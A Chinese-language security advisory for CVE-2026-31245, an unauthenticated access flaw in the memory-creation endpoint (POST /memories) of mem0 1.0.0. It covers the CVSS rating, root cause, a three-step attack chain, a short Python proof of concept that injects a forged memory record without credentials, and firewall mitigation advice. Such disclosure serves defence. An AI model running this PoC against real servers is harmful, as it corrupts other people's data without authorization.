CVE-2026-31245 CVSS 5.3 中危

CVE-2026-31245 mem0内存创建API未授权访问漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31245

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

mem0

漏洞概述

mem0 1.0.0 版本的内存创建 API 端点（POST /memories）存在严重的访问控制缺陷。由于该接口未实施必要的身份认证和授权机制，任何远程攻击者均可在无需登录的情况下直接访问。攻击者利用此漏洞可向服务器提交任意构造的内存记录，导致恶意数据被写入数据库。这不仅造成未授权的数据注入，还可能引发严重的数据污染问题，破坏系统完整性。

技术细节

该漏洞的根本原因在于 mem0 服务器在架构设计上对 POST /memories 接口的访问控制存在疏漏。具体而言，当服务器接收到创建内存的请求时，后端逻辑没有验证请求头中是否包含有效的身份凭证（如 Bearer Token 或 Session ID），也未对调用者的权限进行校验。这使得该端点向互联网完全暴露。攻击者利用此漏洞的技术门槛极低，只需构造一个标准的 HTTP POST 请求，并在 Body 中填充 JSON 格式的恶意数据，发送至目标服务器的 /memories 路径即可。服务器会错误地将其视为合法请求并执行数据库写入操作。由于 CVSS 向量显示无需用户交互（UI:N）且无需前置权限（PR:N），攻击者可进行批量化的自动化攻击，导致数据库迅速被垃圾数据或伪造信息污染，破坏系统的数据完整性。

攻击链分析

STEP 1

侦察

攻击者扫描网络或通过搜索引擎发现对外开放的 mem0 服务器实例（默认端口或特定路径）。

STEP 2

漏洞利用

攻击者向目标服务器的 POST /memories 端点发送特制的 HTTP POST 请求，请求体中包含恶意或伪造的 JSON 数据，且不携带任何认证信息。

STEP 3

影响达成

服务器由于未校验身份，直接接受请求并将恶意数据写入数据库。导致数据完整性受损，产生垃圾数据或被注入误导性信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
# Replace with the actual address of the vulnerable mem0 server
target_url = "http://target-ip:port/memories"

# Malicious payload to be injected into the database
malicious_payload = {
    "text": "This is a malicious memory entry injected by CVE-2026-31245 PoC.",
    "user_id": "attacker_controlled_id",
    "metadata": {
        "is_malicious": True,
        "source": "exploit"
    }
}

try:
    # Send unauthenticated POST request to the vulnerable endpoint
    print(f"[*] Sending payload to {target_url}...")
    response = requests.post(target_url, json=malicious_payload, timeout=10)

    # Check if the injection was successful (HTTP 200 or 201 usually indicates success)
    if response.status_code in [200, 201]:
        print("[+] Exploit successful! Data injected.")
        print("[+] Server response:", response.text)
    else:
        print(f"[-] Exploit failed or unexpected status code: {response.status_code}")
        print("[-] Server response:", response.text)

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred during the request: {e}")

影响范围

mem0 1.0.0

防御指南

临时缓解措施

建议立即在网络边界（防火墙或反向代理）限制对 /memories 接口的访问，仅允许可信的内部 IP 地址调用。同时，应审计现有数据库中的数据，排查已被注入的恶意记录并进行清理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-31245
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-31245
3 Details https://www.cvedetails.com/cve/CVE-2026-31245/
4 VulDB https://vuldb.com/cve/CVE-2026-31245
5 Link https://github.com/mem0ai/mem0
6 Link https://www.notion.so/CVE-2026-31245-35d1e1393188810aab57ff9b49146b05

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表